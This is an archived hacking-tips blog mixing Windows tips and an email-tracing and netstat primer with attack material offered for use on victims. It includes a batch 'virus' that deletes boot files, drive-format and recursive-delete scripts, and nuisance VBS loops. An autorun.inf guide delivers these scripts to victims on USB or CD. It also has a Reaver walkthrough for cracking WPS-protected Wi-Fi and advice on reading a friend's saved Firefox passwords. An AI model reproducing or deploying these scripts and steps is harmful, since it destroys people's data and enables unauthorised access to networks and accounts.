Nuffnang Ads

Wednesday, September 25, 2013

Fast Switch User in Windows

There is a way to change users from the command prompt without logging off Windows.

1) Press Ctrl+Alt+Del to launch Task Manager and look for a process in the list called explorer.exe.
Click the End Process button.
2) Next, click on the file menu and choose New Task (Run…)
3) Enter “cmd” and hit enter to open the Command Prompt window
4) Inside the Command Prompt, use following syntax:
runas /user:username “explorer”
For example to switch to “Administrator” account, use the following command:
runas /user:Administrator “explorer”

Monday, September 9, 2013

Schedule Turn On/Shut Down Computer

To automatically start your computer up at a specific time of day, you'll actually need to edit your BIOS settings.

To do this:

Boot up your computer and enter your BIOS setup. Usually this involves pressing the Delete key as your computer boots (your computer should say Press DEL to Enter Setup or something similar as you turn it on).

Navigate to the Power Options. If your BIOS supports it, there should be a function for automatically starting up your computer at a certain time of day. Mine was called "Resume by Alarm", but yours might be called something different.

Enable that setting and set the time you want your computer to start every day. Save and Exit the BIOS, and your computer should follow that schedule from now on.

You probably shut down your computer when you're done using it at the end of the day, but if not, you can set it to shut itself down on a schedule. This is easy to do with Windows Task Scheduler.

Hit the Start menu and type in "task scheduler". Open up Task Scheduler from your results.
In the right pane, hit Create Task. Give it a name, and under the General tab, check "Run with highest privileges". Also check "Run whether user is logged on or not", if you ever leave your computer logged out.
Head to the Settings tab and check "Stop the task if it runs longer than" and set it to "1 hour". This won't stop your computer from sleeping, but will stop your computer from thinking a task is still running.
Head to the Actions tab, hit New, and choose "Start a Program" as your action. Set the Program to shutdown and the arguments to -s.

Lastly, head to the Triggers tab and click New. Change the schedule to fit whatever you want (say, Daily at 12:00AM), and hit OK. Hit OK again at the next window and your task should be saved in Task Scheduler.

Another easy way to configure it, just schedule a task and run a shutdown batch command that can be found in this blog.


That's it.
Now your computer should shut down and wake up on your own schedule.

Monday, August 26, 2013

RunAsDate

Today, let me introduce an application that allow you to run a program in the date and time that you specify.

This utility doesn't change the current system date and time of your computer, but it only injects the date/time that you specify into the desired application.


You can run multiple applications simultaneously, each application works with different date and time, while the real date/time of your system continues to run normally

.RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.

DOWNLOAD 32bit
DOWNLOAD 64bit



Source: http://www.nirsoft.net/utils/run_as_date.html

Thursday, August 22, 2013

Stored Password from Firefox

This is Really Amazing when I was moving through my Browser's settings and found the place  where all the passwords are stored.
I was really shocked that it allowed me to have a look at all the Username and Password which I had asked my computer to remember which also included my Internet Username and Password. But this is only possible in Mozila Firefox.

To Hack your friends Password you only need even less than a minute and you can have a quick look at your friends Usernames and Passwords.

Just follow the following steps:

Open Mozila Firefox
Goto Tools -> Options -> Security -> Saved Password Button

It will show you a list of websites with the usernames. To get the Passwords Click on Show Passwords Button.
Now To get the Internet Password Just see for any IP address in the website column this is the Ip address of that computer and Username and Pass is what you want.

Friday, August 9, 2013

Crack WPA/WPA2 with Reaver

WPA/WPA2 has become less secure. Within a matter of hours you can retrieve the WiFi password thanks to a useful tool called Reaver. A team named Tactical Network Solutions found a weakness in WPA that allows for an attacker to brute force against the Wifi Protected Setup Pins and recover an access points password within 4-10 hours. The tool we are going to be using with this method is called Reaver. This method may only be used if the WiFi network is using PSK (Public Shared Key) as the authentication method.

In this tutorial I will be using Backtrack 5 RC3. You can use any type of modern Linux Distro though.

In order to do this attack, you will require a wireless adapter that can be put into monitor mode. I recommend the Realtek RTL8187. Alfa cards will also do the job and you can find either one of these online for pretty cheap.

Step 1: Open a terminal window and find your wireless adapter.

Type in airmon-ng and this will display the wireless adapters you have connected.
Notice the interface in the screenshot above is “wlan0″. I will use this in the next step.

Step 2: Put your Wireless Adapter into monitor mode.

You can do this by typing: airmon-ng start wlan0
(Yours may be different than wlan0, make sure to get the interface from the first step.)
Monitor mode basically lets your wireless adapter monitor all traffic received.
After this is complete, you will see at the bottom: “monitor mode enabled on mon0″. This ensures that your Wireless Adapter has been set to monitor mode.

Step 3: Determine which Access Point to attack.

In this step we will find out the BSSID of the access point you want to attack. This is the unique identifier for the access point.

Type: airodump-ng mon0
This will list all of the access points that are in your area and give their BSSIDs:
For this tutorial, I will be using that top network “linksys”
Under “Auth” you will see PSK (Public Shared Key). This cracking process will only work if the network is using PSK. Take note of the BSSID and the Channel number.

Step 4: Let’s get cracking

We will now use Reaver to target the specific BSSID and Channel number to retrieve the password from the router.
The command you will type in is:
reaver -i mon0 -c 6 -b 80:96:B1:AA:A3:92 -vv
The 6 and the 80:96:B1:AA:A3:92 will be different for you of course, depending on the channel and BSSID you are targeting.
-i = The interface you wish to use.
-c = The channel number
-b = The BSSID of the access point.
-vv = Very verbose, it gives detailed information along the way but it is not required.

As you can see, Reaver starts by trying pin 12345670 against the Public Shared Key. It will keep trying pins until the correct one is found. When it is found, the access points password will be shown to you! 
*This process can take roughly 4-10 hours.



Friday, August 2, 2013

Virus To Crush The Windows

This code will shutdown the computer and never to reboot again! Use with care! Copy the following code into notepad: @echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini @echo off msg * YOU GOT OWNED!!! shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive Save as Hackmimic_crushwindows.bat *Search this blog for autorun script and automate it. Feel free to leave comments~

Tuesday, June 25, 2013

Toggle Caps Lock

This code will toggle the caps lock button simultaneously...quite annoying >.<

Copy the following code into notepad:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save as Hackmimic_capslock.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Monday, June 24, 2013

Hit Enter Key

This code will send enter key simultaneously to the victim machine. It will be stop after the computer restart.

Copy the following code into notepad:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save as Hackmimic_enter.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Sunday, June 23, 2013

Pop Out CD Drive

This code will pop out all the CD Drive of your victim, if there are more than one, it pop out all.
Quite stupid yet fun...restart the pc will clear and stop the script.

Copy the following code into notepad:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save as Hackmimic_popout.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Saturday, June 22, 2013

Remove Directory

When executed, this code will actually delete all directories and files in the specific directory. Work similar to delete/erase but instead of a file at a time, rd command is to remove the whole directory, leave you a fresh empty folder.

Copy the following code into notepad:

rd J:\ /s /q

Save as Hackmimic_rd.bat

Remove Directory Help

RMDIR [/S] [/Q] [drive:]path
RD [/S] [/Q] [drive:]path

    /S      Removes all directories and files in the specified directory
            in addition to the directory itself.  Used to remove a directory
            tree.

    /Q      Quiet mode, do not ask if ok to remove a directory tree with /S

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Friday, June 21, 2013

Format Drive

The following code will format all the define drive letter in computer.

Copy the code below into notepad:

format D: /q /x

Save as Hackmimic_format.cmd

Good to go now...

*Replace D for any other drive letter
*You can make multiple line for different disk drive
*Perform a test on USB drive to check result

Format Help

FORMAT volume [/FS:file-system] [/V:label] [/Q] [/A:size] [/C] [/X]
FORMAT volume [/V:label] [/Q] [/F:size]
FORMAT volume [/V:label] [/Q] [/T:tracks /N:sectors]
FORMAT volume [/V:label] [/Q]
FORMAT volume [/Q]

  volume          Specifies the drive letter (followed by a colon),
                  mount point, or volume name.
  /FS:filesystem  Specifies the type of the file system (FAT, FAT32, or NTFS).
  /V:label        Specifies the volume label.
  /Q              Performs a quick format.
  /C              NTFS only: Files created on the new volume will be compressed
                  by default.
  /X              Forces the volume to dismount first if necessary.  All opened
                  handles to the volume would no longer be valid.
  /A:size         Overrides the default allocation unit size. Default settings
                  are strongly recommended for general use.
                  NTFS supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K.
                  FAT supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).
                  FAT32 supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).

                  Note that the FAT and FAT32 files systems impose the
                  following restrictions on the number of clusters on a volume:

                  FAT: Number of clusters <= 65526
                  FAT32: 65526 < Number of clusters < 4177918

                  Format will immediately stop processing if it decides that
                  the above requirements cannot be met using the specified
                  cluster size.

                  NTFS compression is not supported for allocation unit sizes
                  above 4096.

  /F:size         Specifies the size of the floppy disk to format (1.44)
  /T:tracks       Specifies the number of tracks per disk side.
  /N:sectors      Specifies the number of sectors per track.

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Metasploit

Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.

Here is a brief table of contents for Singh's book:

Chapter 1: Metasploit Quick Tips for Security Professionals covering: configuration, installation, basic use, and storing results in a database
Chapter 2: Information Gathering and Scanning covering: passive and active gathering, social engineering, scanning, Nessus, NeXpose, and Dradis
Chapter 3: Operating System-based Vulnerability Assessment covering: exploits, Windows XP, remote shells, Windows 2003, Windows 7, Linux, and DLL injection
Chapter 4: Client-side Exploitation and Antivirus bypass covering: IE, Word, Adobe Reader, payloads, and killing anti-virus
Chapter 5: Using Meterpreter to Explore the Compromised Target covering: Meterpreter commands, privilege escalation, communication channels, and snooping on Windows targets
Chapter 6: Advanced Meterpreter Scripting covering: hash dumps, back doors, pivoting, Railgun, pivoting, and killing firewalls
Chapter 7: Working with Modules for Penetration Testing covering: Auxiliary modules, admin modules, SQL injection, post-exploitation, and creating new modules
Chapter 8: Working with Exploits covering: mixins, msfvenum, going from exploit to Metasploit module, and fuzzing
Chapter 9: Working with Armitage covering: Getting started, information gathering, and targeting multiple machines
Chapter 10: Social Engineering Toolkit covering: Installation, configuration, spear-phishing, website attacks, and infectious media generation.

To summarize, if you are looking for a Metasploit book in cookbook format than this book would be a good choice.  

Metasploit Official Website: http://www.metasploit.com/
Download E-Book: DOWNLOAD
Unlock Password: hackmimic.blogspot.com
*leave a message for my if link is dead

Thursday, June 20, 2013

Penetration Test

Penetration testing in simple words can be defined as the test on the live networks or servers directly by attacking by the trained ethical hacking professional person or network security administrator.

If you still cant get, let me make it simpler for you. Consider an organization having its employee working on certain software. It stores all database into some kind of “database server”. What will we do is just hire some ethical hacking trained person & he will directly conduct the test on the possible vulnerable areas of the system or network or the software.

Classification of Penetration Testing

Penetration testing is basically classified according to the things that are known to ethical hackers. It is classified as follows

- White Box Testing
- Black Box Testing

In white box tests the ethical hacker physically sees all network & its previous data & updates. Means he knows everything then he performs testing.

In black box testing ethical hackers do complete attack without knowing even the operating stem on the networks. So black box test is real hard thing to do in ethical hacking.

Wednesday, June 19, 2013

Delete Folder

This code will delete anything define when executed.
Copy the following code into notepad without the quote:

"erase C:\Program Files\Common Files"

Save as "Hackmimic.cmd"

When execute, the common files folder inside program files will be permanently deleted.

For Testing

Create a text file in C: drive
Name it as hackmimic.txt
Use "erase C:\hackmimic.txt"

Erase Help

Deletes one or more files.

DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names

  names         Specifies a list of one or more files or directories.
                Wildcards may be used to delete multiple files. If a
                directory is specified, all files within the directory
                will be deleted.

  /P            Prompts for confirmation before deleting each file.
  /F            Force deleting of read-only files.
  /S            Delete specified files from all subdirectories.
  /Q            Quiet mode, do not ask if ok to delete on global wildcard
  /A            Selects files to delete based on attributes
  attributes    R  Read-only files            S  System files
                H  Hidden files               A  Files ready for archiving
                -  Prefix meaning not

If Command Extensions are enabled DEL and ERASE change as follows:

The display semantics of the /S switch are reversed in that it shows
you only the files that are deleted, not the ones it could not find.

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Autorun File

Create an autorun file that will execute other files when loaded.

Step by Step Tutorial


  1. Open notepad, type the following code inside.
  2. [AUTORUN] open=filename.extension
  3. Save as "autorun.inf"
  4. Finish, Simple, Thats it!
So, what we can do with it?
Go back to step 2 and check on the filename.extension, usually...
We put our simple script file to it such as shutdown.bat, format.cmd, and etc.
Finally, copy both file into an USB or CD and pass it to your victim. Watch the result.

Tuesday, June 18, 2013

How Spammers get your Email

Spam is amazing. In an unprecedented and astonishing effort, junk email reaches almost everybody online.
All it takes to get on the mailing lists used by spammers is an email address. There is no need to sign up for anything or ask for emails. The spam just starts coming, out of nowhere, apparently without any plan, and without a reason. It invades email addresses that are never used.

But how do spammers discover email addresses? How do they find your mailbox when your best friend does not?

Dictionary Attack

Big free email providers like Windows Live Hotmail or Yahoo! Mail are a spammer's paradise, at least when it comes to finding spammable addresses.

Millions of users share one common domain name, so you already know that ("gmail.com" in the case of gmail). Try to sign up for a new account and you will discover that guessing an existing user name is not difficult either. Most short and good names are taken.

So, to find email addresses at a large ISP, it's enough to combine the domain name with a random user name. Chances are both "ethan1@hotmailcom" and "ethan2@hotmail.com" exist.

To beat this kind of spammer attack, use long and difficult addresses.

Brute Searching Force

Another tactic employed by spammers to discover email addresses is to search common sources for email addresses. They have robots scanning web pages and following links.

These address harvesting bots work a lot like the search engines' robots, only they're not after the page content at all. Strings with '@' somewhere in the middle and a top-level domain at the end are all the spammers are interested in.

While not picky, the pages the spammers are particularly keen to visit are web forums, chat rooms and web-based interfaces to usenet because lots of email addresses are likely to be found there.

This is why you should

  • disguise your email address when you use it on the net or, better yet,
  • use disposable email addresses.

If you post your address on your own web page or blog, you can

Encode it
so visitors who want to send you an email can see and use it, but spambots cannot. Again,

Using a disposabe address
provides a very effective and at the same time convenient alternative.

Worms Turning Infested PCs Into Spam Zombies

To avoid being detected and filtered, spammers seek to send their emails from a distributed network of computers. Ideally, these computers are not even their own but those of unsuspecting users.

To build such a distributed network of spam zombies, spammers cooperate with virus authors who equip their worms with small programs that can send bulk emails.

Additionally, these spam sending engines will often scan the user's address book, web cache and files for email addresses. That's another chance for spammers to catch your address, and this one is particularly difficult to avoid.

The best anybody can do is

  • keeping their email program updated and patched,
  • being vary of any attachments they did not request and
  • doing virus scans with a free, up to date scanner regularly.

Monday, June 17, 2013

Infinite Loop

This code will continuously show message to the target machine until the victim manually close it.
Copy the following code into notepad:
@ECHO off
:BEGIN
msg * Gotcha! Say cheese...
GOTO BEGIN


This code will continuously open up command prompt screen infinite times and  irritate victim and affecting performance.
Copy the following code into notepad:
:x
start cmd.exe

GOTO x

save as Hackmimic_msg.bat, then you can open the file.

*You can replace with any message after the echo tag with a space.
*You can put multiple echo as well.
*Search this blog for autorun script and automate it.
Feel free to leave comments~

Thursday, June 13, 2013

ASCII Description & Table

Description

ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as 'a' or '@' or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they want 'plain' text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as 'text only'

Table

Extended ASCII Table


Wednesday, June 12, 2013

Password Protect Google Chrome

Simple Startup Password is an addon for Google Chrome browser that blocks unauthorized people from using your browser.  Just go to the extensions gallery of Google Chrome and install the Simple Startup Password add-on for your browser.
After installing the add-on go to Settings -> Tools ->Extensions. There look for Simple Startup Password and click on Options. Set a password for your browser and done. Now every time you start your Google Chrome browser it will ask you for the password and if you fail to give the correct password your browser will be closed.

You can get this add on from Google Chrome’s extensions gallery.
Link : Simple Startup Password for Google Chrome

In case you forget your password there is no option to recover it. You will have to re-install the browser.

Trace Email

While sending or receiving an email ,our browser uses two protocols:
SMTP(Simple mail transfer protocol)Port 25
POP(Post office protocol)Port 110

Whenever click on the send button of your browser for sending a mail, the mail first reaches the Source mail server from there it goes to Interim mail server from there it moves to Destination  mail server and at last to destination inbox. So as you see its not a complicated process and can be described by the following diagram: |Sender Outbox-----> Source Mail Server-----> Interim Mail Servers-----> Destination Mail Server------> Destination Inbox|

All the emails does not travel alone they carry email header with them.
This email header reveals the path taken by the email to reach its
destination.

Tracing Time:

Here I will take a real life example of a email that was send to me.
The email header is:

From John Wed Jun 12 20:36:53 2013

X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530

Return-Path: <dt_biz@terenciri.com>

X-YahooFilteredBulk: 209.124.87.14

X-Originating-IP: [209.124.87.14]

Received: from 209.124.87.14  (HELO org.pickepair.com) (209.124.87.14)

by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530

From: John <DT_Biz@terenciri.com>

Subject:Stop paying for CDs.
To: divya_football@yahoo.co.in

Date: Wed, 12 Jun 2013 11:06:53 EDT

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"


Before tracing the first thing is to divide the mails in 3-4 lines and then
I will explain you each line.
So lets begin:
Date: Wed, 12 Jun 2013 11:06:53 EDT

From: John <DT_Biz@terenciri.com>

To: divya_football@yahoo.co.in

Subject:Stop paying for CDs.

Date: Wed, 12 Jun 2013 11:06:53 EDT

This line tells us the date on which the mail was sent to me.
From: John <DT_Biz@terenciri.com>

This line tells me the email of the person who sent the the mail.
To: divya_football@yahoo.co.in
This line tells us to whom the mail was sent , in this case it is my email.
Subject:Stop paying for CDs.
This line tells us the subject of the message.

X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530

Return-Path: <dt_biz@terenciri.com>

X-YahooFilteredBulk: 209.124.87.14


X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530

This line tells me the that the message was sent to my email via 203.104.17.163
on Wednesday 12nd June 2013.
Return-Path: <dt_biz@terenciri.com>

again this line tells me the email of the person who send me this mail.
X-YahooFilteredBulk: 209.124.87.14

This line tells me that the message was filtered by 209.124.87.14
X-Originating-IP: [209.124.87.14]

This line tells me the IP address of the person who send me this email.
Received: from 209.124.87.14  (HELO org.pickepair.com) (209.124.87.14)

by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530

Again this line tells us the IP address of the person who sent this mail and contain some SMTP command which you will learn in the next lesson.

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

MIME-Version: 1.0
This line tells me the software that the attacker used to send me the
message
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
This line tells me the type of the text the email used.
The header can be viewed by going to action in yahoo mail and in gmail it would be found in settings. If you use some other website then the best way is to find it using google. Now if you have got the IP address what can you do?

The answer is very simple you can just do a whois scan for that IP address.
Whois is a tool that has information about all the hosts.When I did a whois scan for the above IP address it reavels the following information:

Whois IP 209.124.87.14

Updated 1 second ago
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#


#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=209.124.87.14?showDetails=true&showARIN=false&ext=netref2
#


# start

NetRange:       209.124.64.0 - 209.124.95.255
CIDR:           209.124.64.0/19
OriginAS:       
NetName:        DRAGON-BLK-1
NetHandle:      NET-209-124-64-0-1
Parent:         NET-209-0-0-0-0
NetType:        Direct Allocation
Comment:        ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate:        1999-04-20
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-209-124-64-0-1

OrgName:        Dragon Networks, Inc.
OrgId:          DRAGON-8
Address:        93, Moor Lane
City:           Wilmslow
StateProv:      Cheshire
PostalCode:     SK9 6BR
Country:        GB
RegDate:        2002-05-19
Updated:        2012-06-21
Ref:            http://whois.arin.net/rest/org/DRAGON-8

OrgAbuseHandle: ABUSE1150-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1 404.300.9889 
OrgAbuseEmail:  email@dragonnetwurx.com
OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE1150-ARIN

OrgNOCHandle: CTS4-ARIN
OrgNOCName:   Smith, Charles T
OrgNOCPhone:  +1 404-949-7884 
OrgNOCEmail:  email@dragonnetwurx.com
OrgNOCRef:    http://whois.arin.net/rest/poc/CTS4-ARIN

OrgTechHandle: ABUSE1150-ARIN
OrgTechName:   Abuse
OrgTechPhone:  +1 404.300.9889 
OrgTechEmail:  email@dragonnetwurx.com
OrgTechRef:    http://whois.arin.net/rest/poc/ABUSE1150-ARIN

# end


# start

NetRange:       209.124.87.0 - 209.124.87.15
CIDR:           209.124.87.0/28
OriginAS:       AS22653
NetName:        NET-209-124-87-0-1
NetHandle:      NET-209-124-87-0-1
Parent:         NET-209-124-64-0-1
NetType:        Reassigned
RegDate:        2013-04-26
Updated:        2013-04-26
Ref:            http://whois.arin.net/rest/net/NET-209-124-87-0-1

OrgName:        J. Eaton
OrgId:          JE-98
Address:        PO Box 3109 # 22016
City:           Houston
StateProv:      TX
PostalCode:     77253-3109
Country:        US
RegDate:        2013-04-26
Updated:        2013-04-26
Ref:            http://whois.arin.net/rest/org/JE-98

OrgAbuseHandle: ADMIN4210-ARIN
OrgAbuseName:   Administrator
OrgAbusePhone:  +1-760-683-4974 
OrgAbuseEmail:  email@gmail.com
OrgAbuseRef:    http://whois.arin.net/rest/poc/ADMIN4210-ARIN

OrgTechHandle: ADMIN4210-ARIN
OrgTechName:   Administrator
OrgTechPhone:  +1-760-683-4974 
OrgTechEmail:  email@gmail.com
OrgTechRef:    http://whois.arin.net/rest/poc/ADMIN4210-ARIN

# end



#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html 
#

iMacros

iMacros is an extension for the Mozilla Firefox, Google Chrome, and Internet Explorer web browsers which adds record and replay functionality similar to that found in web testing and form filler software. The macros can be combined and controlled via JavaScript. Demo macros and JavaScript code examples are included with the software. iMacros was developed by iOpus. First released in 2001, iMacros was the first macro recorder tool specifically designed and optimized for web browsers and form filling.
iMacros for Firefox and Chrome offers a feature known as social scripting. It allows users to share macros and scripts in a way that is similar to how they share bookmarks on the many social bookmarking websites. After creating a new macro, users can click just once to share it with their friends as a link, either by distributing the link via email and social bookmarking websites, or by embedding it in a website or blog for public access. Technically, this is accomplished by embedding the imacro and the controlling JavaScript inside a plain text link.

Along with the freeware version, iMacros is available as a proprietary commercial application, with additional features and support for web scripting, web scraping, internet server monitoring, and web testing. In addition to working with HTML pages, the commercial editions can automate Adobe Flash, Adobe Flex, Silverlight, and Java applets by using Directscreen and image recognition technology.
Advanced versions also contain a command-line interface and an application programming interface (API) to automate more complicated tasks and integrate with other programs or scripts. The iMacros API is called Scripting Interface. The Scripting Interface of the iMacros Scripting Edition is designed as a Component Object Model (COM) object and allows the user to remotely control (script) the iMacros Browser, Internet Explorer, and Firefox from any Windows programming or scripting language.

Friday, June 7, 2013

Track Down a Hacker

Sometimes, it's just not enough to simply know that there's a Trojan or Virus onboard. Sometimes you need to know exactly why that file is on-board, how it got there - but most importantly, who put it there.
By enumerating the attacker in the same way that they have enumerated the victim, you will be able to see the bigger picture and establish what you're up against.

Connections make the world go round

The computer world, at any rate. Every single time you open up a website, send an email or upload your webpages into cyberspace, you are connecting to another machine in order to get the job done. This, of course, presents a major problem, because this simple act is what allows malicious users to target a machine in the first place. 

# How do these people find their victim? 
Well, first of all, they need to get hold of the victim's IP Address. Your IP (Internet Protocol) address reveals your point of entry to the Internet and can be used in many ways to cause your online activities many, many problems. It may not reveal you by name, but it may be uniquely identifiable and it represents your digital ID while you are online (especially so if you're on a fixed IP / DSL etc). 

With an IP address, a Hacker can find out all sorts of weird and wonderful things about their victim (as well as causing all kinds of other trouble, the biggest two being Portnukes/Trojans and the dreaded DoS ((Denial of Service)) attack). Some Hackers like to collect IP Addresses like badges, and like to go back to old targets, messing them around every so often. An IP address is incredibly easy to obtain - until recently, many realtime chat applications (such as MSN) were goldmines of information. Your IP Address is contained as part of the Header Code on all emails that you send and webpages that you visit can store all kinds of information about you. 

A common trick is for the Hacker to go into a Chatroom, paste his supposed website address all over the place, and when the unsuspecting victim visits, everything about your computer from the operating system to the screen resolution can be logged...and, of course, the all important IP address. In addition, a simple network-wide port scan will reveal vulnerable target machines, and a war-dialler will scan thousands of lines for exposed modems that the hacker can exploit. 

So now that you know some of the basic dangers, you're probably wondering how these people connect to a victim's machine? 

Virtual and Physical Ports

Everything that you recieve over the Internet comes as a result of other machines connecting to your computer's ports. You have two types; Physical are the holes in the back of your machine, but the important ones are Virtual. These allow transfer of data between your computer and the outside world, some with allocated functions, some without, but knowing how these work is the first step to discovering who is attacking you; you simply MUST have a basic knowledge of this, or you won't get much further.

What the phrases TCP/UDP actually mean?

TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is compressed, then a header is put on it and it is sent to another computer (UDP stands for User Datagram Protocol). This is how ALL internet transfers occur, by sending packets. The header in a packet contains the IP address of the one who originally sent you it. Now, your computer comes with an excellent (and free) tool that allows you to see anything that is connected (or is attempting to connect) to you, although bear in mind that it offers no blocking protection; it simply tells you what is going on, and that tool is NETSTAT. 

Netstat: Your first line of defence

Netstat is a very fast and reliable method of seeing exactly who or what is connected (or connecting) to your computer. Open up DOS (Start/Programs/MS-DOS Prompt on most systems), and in the MSDOS Prompt, type: 

netstat -a 
(make sure you include the space inbetween the "t" and the "a"). 
If you're connected to the Internet when you do this, you should see something like: 

Active Connections 
Proto Local Address Foreign Address State 
TCP macintosh: 20034 modem-123.tun.dialup.co.uk: 50505 ESTABLISHED 
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT 
TCP macintosh MACINTOSH: 0 LISTENING 
TCP macintosh MACINTOSH: 0 LISTENING 
TCP macintosh MACINTOSH: 0 LISTENING 

Now, "Proto(col)" simply means what kind of data transmission is taking place (TCP or UDP), "Local address" is your computer (and the number next to it tells you what port you're connected on), "Foreign Address" is the machine that is connected to you (and what port they're using), and finally "State" is simply whether or not a connection is actually established, or whether the machine in question is waiting for a transmission, or timing out etc. 

Now, you need to know all of Netstat's various commands, so type: 

netstat ? 

You will get something like this: 
Displays protocol statistics and current TCP/IP network connections. 
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 
-a Displays all connections and listening ports. 
-e Displays Ethernet statistics. This may be combined with the -s option. 
-n Displays addresses and port numbers in numerical form. 
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. 
-r Displays the routing table. 
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. 

Have a play around with the various options, but the most important use of these methods is when you combine them. The best command to use is 

netstat -an 

because this will list all connections in Numerical Form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful. 

Also, 
netstat -b 
will tell you what ports are open and what programs are connecting to the internet. 

Types of Port

It would be impossible to find out who was attacking you if computers could just access any old port to perform an important function; how could you tell a mail transfer from a Trojan Attack? Well, good news, because your regular, normal connections are assigned to low, commonly used ports, and in general, the higher the number used, the more you should be suspicious. Here are the three main types of port: 

# Well Known Ports These run from 0 to 1023, and are bound to the common services that run on them (for example, mail runs on channel 25 tcp/udp, which is smtp (Simple Mail Transfer Protocol) so if you find one of these ports open (and you usually will), it's usually because of an essential function. 

# Registered Ports These run on 1024 to 49151. Although not bound to a particular service, these are normally used by networking utilities like FTP software, Email client and so on, and they do this by opening on a random port within this range before communicating with the remote server, so don't panic (just be wary, perhaps) if you see any of these open, because they usually close automatically when the system that's running on them terminates (for example, type in a common website name in your browser with netstat open, and watch as it opens up a port at random to act as a buffer for the remote servers). Services like MSN Messenger and ICQ usually run on these Ports. 

# Dynamic/Private Ports Ranging from 49152 to 65535, these things are rarely used except with certain programs, and even then not very often. This is indeed the usual range of the Trojan, so if you find any of these open, be very suspicious. So, just to recap: 

Well Known Ports 0 to 1023 Commonly used, little danger. 
Registered Ports 1024 to 49151 Not as common, just be careful. 
Dynamic/Private Ports 49152 to 65535 Be extremely suspicious. 

The hunt is on

Now, it is essential that you know what you're looking for, and the most common way someone will attack your machine is with a Trojan. This is a program that is sent to you in an email, or attempts to bind itself to one of your ports, and when activated, it can give the user your passwords, access to your hard drive...they can even make your CD Tray pop open and shut. At the end of this Document, you will find a list of the most commonly used Trojans and the ports they operate on. For now, let's take another look at that first example of Netstat.... 

Active Connections 
Proto Local Address Foreign Address State 
TCP macintosh: 27374 modem-123.tun.dialup.co.uk: 50505 ESTABLISHED 
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT 
TCP macintosh MACINTOSH: 0 LISTENING 
TCP macintosh MACINTOSH: 0 LISTENING 
TCP macintosh MACINTOSH: 0 LISTENING 

